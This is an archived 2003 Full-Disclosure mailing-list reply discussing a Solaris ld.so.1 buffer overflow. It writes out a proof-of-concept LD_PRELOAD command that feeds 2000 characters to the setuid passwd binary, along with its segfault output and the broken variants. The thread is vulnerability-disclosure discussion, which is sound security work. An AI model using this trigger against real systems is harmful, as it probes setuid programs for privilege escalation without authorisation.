lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <1059689116.503.134.camel@cryptik>
From: uidzer0 at sptrm.com (uidzer0)
Subject: Re: Fwd: Re: Solaris ld.so.1 buffer overflow

Paul, you are mistaken. Why are you trying to escape the backtick with a
'/' (forwardslash) ... Escapes are '\' (backslash) .. But nice try. But
since you must not have any nix boxes around, let me be the nice guy and
show you the output of your misguided command structure. And let's not
even go into why you would want to escape the perl command anyhow,
seeing how that totally defeats the purpose of this entire thread.

so, here we go.

Paul wants to escape perl.. sounds good, lets see what happens.

LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd
LD_PRELOAD=`perl: Command not found.

So, now, Paul wants to use his so-called escape character (/) to escape
just the trailing backtick.. so here we go:

LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
LD_PRELOAD=/: Command not found.

So, the correct way of doing this is exactly the way David posted
originally.

$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
ld.so.1: passwd: warning:
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

... (bunch of A's)

AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname
Segmentation Fault

oh, and this was done on a solaris 8 box.

peace

-0

On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote:
> > -----Original Message-----
> > From: Jim Dew [mailto:jdew@...drasil.ca] 
> > Sent: Wednesday, July 30, 2003 8:19 PM
> > To: Jouko Pynnonen
> > Cc: full-disclosure@...ts.netsys.com
> > Subject: [Full-Disclosure] Re: Fwd: Re: Solaris ld.so.1 
> > buffer overflow
> > 
> > 
> > On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:
> > > 
> > > On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:
> > > > Modify the command (you need to add a trailing slash) to be the 
> > > > following:
> > > > 
> > > > LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
> > > > 
> > > > and try it again.
> > > 
> > 
> > this segfaults on solaris 2.6
> > 
> Try moving the escape to *before* the backtick:
> LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
> 
> Paul Schmehl (pauls@...allas.edu)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/~pauls/ 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists